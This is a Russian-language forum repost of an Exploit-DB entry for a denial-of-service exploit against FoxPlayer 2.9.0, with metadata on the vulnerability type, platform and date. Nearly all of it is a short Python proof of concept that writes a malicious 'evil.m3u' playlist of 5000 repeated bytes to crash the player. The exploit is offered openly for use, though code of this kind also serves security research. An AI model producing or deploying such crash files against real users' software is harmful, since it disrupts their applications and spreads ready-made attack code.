Exploit FoxPlayer 2.9.0 - Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23923
Проверка EDB
  1. Пройдено
Автор
METACOM
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2013-01-06
Код:
#!/usr/bin/python 
# Exploit Title:Denial of Service in FoxPlayer version 2.9.0
# Download link :http://www.foxmediatools.com/installers/fox-player-setup.exe
# Author: metacom
# version: version 2.9.0
# Category: poc
# Tested on: windows 7 German  
 
filename="evil.m3u"
 
buffer = "\x41" * 5000

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
 
Источник
www.exploit-db.com

Похожие темы